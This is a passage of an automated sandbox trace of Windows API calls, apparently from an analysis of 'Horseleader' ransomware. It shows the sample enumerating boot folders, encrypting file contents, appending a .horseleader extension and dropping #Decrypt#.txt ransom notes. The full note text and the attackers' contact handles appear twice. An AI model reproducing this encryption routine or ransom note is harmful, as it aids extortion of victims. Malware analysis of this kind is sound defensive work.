| out: pbBuffer=0x32af478) returned 1 [0121.626] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.626] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.642] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0121.642] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".txt") returned 0x0 [0121.642] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=65536) returned 1 [0121.642] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.643] ReadFile (in: hFile=0x200, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.646] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.646] WriteFile (in: hFile=0x200, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.646] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x5800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.647] ReadFile (in: hFile=0x200, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.647] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.647] WriteFile (in: hFile=0x200, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.648] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xb000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.648] ReadFile (in: hFile=0x200, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.648] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.648] WriteFile (in: hFile=0x200, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.649] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.649] WriteFile (in: hFile=0x200, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0121.649] WriteFile (in: hFile=0x200, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0121.650] CloseHandle (hObject=0x200) returned 1 [0121.660] GetProcessHeap () returned 0x780000 [0121.660] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.660] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.horseleader") returned 36 [0121.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.horseleader" (normalized: "c:\\boot\\bootstat.dat.horseleader")) returned 1 [0121.661] GetProcessHeap () returned 0x780000 [0121.661] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.661] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0121.662] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0121.662] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0121.662] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0121.662] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0121.662] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.662] GetProcessHeap () returned 0x780000 [0121.662] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.662] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0121.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.663] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.663] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0121.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.663] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.663] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.664] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0121.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.664] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.664] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0121.664] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.664] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.664] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.665] lstrlenW (lpString=".testttjffg") returned 11 [0121.665] StrStrW (lpFirst="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.665] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.665] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.665] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.666] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\#Decrypt#.txt") returned 31 [0121.666] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\#Decrypt#.txt" (normalized: "c:\\boot\\cs-cz\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.666] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.666] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.668] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.668] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.668] CloseHandle (hObject=0x200) returned 1 [0121.668] GetProcessHeap () returned 0x780000 [0121.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.669] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="da-DK", cAlternateFileName="")) returned 1 [0121.669] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0121.669] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0121.669] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0121.669] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0121.669] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.669] GetProcessHeap () returned 0x780000 [0121.670] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.670] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0121.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.670] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.670] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0121.670] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.671] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.671] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.671] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0121.671] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.671] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.671] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.671] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0121.671] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.671] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.672] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.672] lstrlenW (lpString=".testttjffg") returned 11 [0121.672] StrStrW (lpFirst="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.672] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.672] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.672] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.682] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.682] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.682] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\#Decrypt#.txt") returned 31 [0121.682] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\#Decrypt#.txt" (normalized: "c:\\boot\\da-dk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.683] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.683] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.687] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.688] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.688] CloseHandle (hObject=0x200) returned 1 [0121.688] GetProcessHeap () returned 0x780000 [0121.689] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.689] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="de-DE", cAlternateFileName="")) returned 1 [0121.689] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0121.689] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0121.689] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0121.689] 